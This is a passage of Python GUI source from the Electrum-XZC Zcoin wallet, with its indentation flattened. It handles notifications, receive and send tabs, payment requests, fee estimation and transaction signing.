_("Electrum's focus is speed, with low resource usage and simplifying Zcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Zcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/sn-ntu/electrum-xzc/issues\">https://github.com/sn-ntu/electrum-xzc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-XZC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-XZC", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-XZC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mXZC'
if self.decimal_point == 8:
return 'XZC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zcoin address where the payment should be received. Note that each payment request uses a different Zcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zcoin addresses.'),
_('The Zcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Zcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
